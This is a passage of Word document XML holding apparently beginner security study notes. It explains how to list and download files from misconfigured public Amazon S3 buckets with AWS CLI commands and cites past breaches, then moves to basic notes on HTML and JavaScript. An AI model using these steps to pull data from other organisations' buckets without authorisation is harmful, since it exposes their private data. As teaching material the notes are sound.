          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB3B85F" wp14:editId="77588E54">
            <wp:extent cx="5943600" cy="71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5943600" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F4359" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="1A7799C2" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If the bucket is accessible, then you will be able to view all the files on the bucket. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795254A8" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="66869F2C" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>While uncommon, s3 buckets can be configured in a way such that any authenticated users can access the bucket(this is uncommon because an administrator would specifically have to write a policy to allow this). In this case, you would be able to list the objects in a bucket using the AWS CLI. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55955BC9" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="5DEF1113" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you’ve found objects on an s3 bucket, you would want to download them to view their contents. You do this using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId229" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>AWS CLI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. To use the AWS CLI, you need to create an account. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376EE4B0" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="34480529" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once you have created an AWS account, you can check the contents of the bucket using the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FACBD6" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aws s3 ls s3://bucket-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356AB7B2" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To download the files, you can use the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A15F12B" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aws s3 cp s3://bucket-name/file-name local-location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1DFBB" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="0C80CBFF" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alternatively, you can also use the following method to access a file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441EBEEB" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucketname.region-name.amazonaws.com/file-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F0992" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24"/>
    <w:p w14:paraId="0C6F1BD4" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Is this realistic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>very</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. There have been a lot of breaches due to s3 bucket misconfigurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B5C2D" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId230" w:history="1">
        <w:r w:rsidR="00B00A24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://arstechnica.com/information-technology/2017/05/defense-contractor-stored-intelligence-data-in-amazon-cloud-unprotected/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="065BDAC1" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId231" w:history="1">
        <w:r w:rsidR="00B00A24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.infosecurity-magazine.com/news/accenture-leaked-data-another-aws/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CE3DEA1" w14:textId="77777777" w:rsidR="00B00A24" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId232" w:history="1">
        <w:r w:rsidR="00B00A24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.infosecurity-magazine.com/news/data-leak-exposes-750k-birth-cert/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50200F5B" w14:textId="317ABCC7" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA8E819" w14:textId="06DCDDB4" w:rsidR="00B00A24" w:rsidRDefault="00B00A24" w:rsidP="00B00A24">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC43E94" w14:textId="56275E60" w:rsidR="00B00A24" w:rsidRDefault="006161C3" w:rsidP="00B00A24">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How Websites Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C79A4" w14:textId="2DDE0914" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>How Websites Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F1A6F" w14:textId="7D9B122A" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Visiting a site makes a request to a web server asking for information about a page being visited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114CC9E" w14:textId="108282B0" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Two Major Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC45D8" w14:textId="426FEA8F" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Front End (Client Side) – browser renders a website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A864C69" w14:textId="752C6F18" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Back End (Server Side) – a server that process requests and return responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AEDAD6" w14:textId="3DF5677D" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8FEE6B" w14:textId="39C0ADE8" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Websites are created by using primarily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC7A7E" w14:textId="20BD6CF4" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTML – to build and define structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548D9AE" w14:textId="12E5CEC2" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CSS – to add styling options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539980F" w14:textId="09FB753E" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript – to implement complex features on pages using interactivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD872B" w14:textId="7CF5D896" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAFE18A" w14:textId="77777777" w:rsidR="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>elements (tags) are the building blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798053B5" w14:textId="77777777" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006161C3">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>The &lt;!DOCTYPE html&gt; defines that the page is a HTML5 document. This helps with standardisation across different browsers and tells the browser to use HTML5 to interpret the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B182CA8" w14:textId="77777777" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006161C3">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>The &lt;html&gt; element is the root element of the HTML page - all other elements come after this element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79760411" w14:textId="77777777" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006161C3">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>The &lt;head&gt; element contains information about the page (such as the page title)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86F49D" w14:textId="77777777" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006161C3">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>The &lt;body&gt; element defines the HTML document's body, only content inside of the body is shown in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37630F5D" w14:textId="77777777" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006161C3">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>The &lt;h1&gt; element defines a large heading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5144F0" w14:textId="77777777" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006161C3">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>The &lt;p&gt; element defines a paragraph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9CC8F" w14:textId="3FE34CD6" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006161C3">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>There are many other elements (tags) used for different purposes. For example, there are tags for: buttons (&lt;button&gt;), images (&lt;img&gt;), lists, and much more. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07777A" w14:textId="19E91DD0" w:rsidR="006161C3" w:rsidRPr="006161C3" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>Tags can contain attributes to style an element, specify locations of an image, etc and can have multiple attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F296DF6" w14:textId="29985EB9" w:rsidR="006161C3" w:rsidRPr="00E040F1" w:rsidRDefault="006161C3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>can have id attribute that is element-unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576AA82" w14:textId="503E9689" w:rsidR="00E040F1" w:rsidRPr="00E040F1" w:rsidRDefault="00E040F1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C21DDF7" w14:textId="7EC33905" w:rsidR="00E040F1" w:rsidRPr="00E040F1" w:rsidRDefault="00E040F1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t>allows pages to become interactive, control functionality, dynamically update, display animations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F69A2" w14:textId="1532D249" w:rsidR="00E040F1" w:rsidRPr="00E040F1" w:rsidRDefault="00E040F1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
        </w:rPr>
        <w:t xml:space="preserve">loaded with script tags or loaded remote with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
